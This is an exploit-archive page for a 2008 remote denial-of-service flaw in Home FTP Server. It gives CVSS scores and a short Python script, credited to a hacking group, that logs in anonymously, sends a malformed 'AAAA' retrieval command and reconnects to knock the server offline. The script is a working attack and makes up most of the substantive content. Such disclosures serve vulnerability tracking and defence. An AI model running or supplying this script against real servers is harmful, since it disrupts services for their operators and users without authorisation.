Home FTP Server DoS

2008.03.25
Credit: 0in
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Discovered by 0in from DaRk-CodeRs Programming & Security Group # Contact: 0in(dot)email[at]gmail(dot)com # Thats a very funny bug, and nobody understand how it works;] # When we send a python FTP retrlines() function bad command and create # a new connection server got DoS... o0 # Thats not overflow, it's probubly in logic application. # Greetings to all DaRk-CodeRs Members: # Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89 # Special THX to: Rade0n3900 # Debug: # ---------------------- # | EIP: 0100FE98 | # | DS:[00FFFFED4]=??? | # | ECX: 0100FED4 | # ---------------------- from ftplib import FTP import time ip="127.0.0.1" login="anonymous" passwd = 'gorion (at) scriptkiddie (dot) pl [email concealed]' print '-------------------------------' print '| HOME FTP SERVER DoS Exploit |' print '| bY 0in From Dark-Coders! |' print '|>>http://dark-coders.4rh.eu<<|' print '-------------------------------' print 'connecting...' ftp=FTP(ip) ftp.login(login,passwd) print 'sending...' try: ftp.retrlines("AAAA") except Exception: print 'ok!\nreconnecting...' ftp=FTP(ip) ftp.quit() print 'DosEd' #EoFF


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top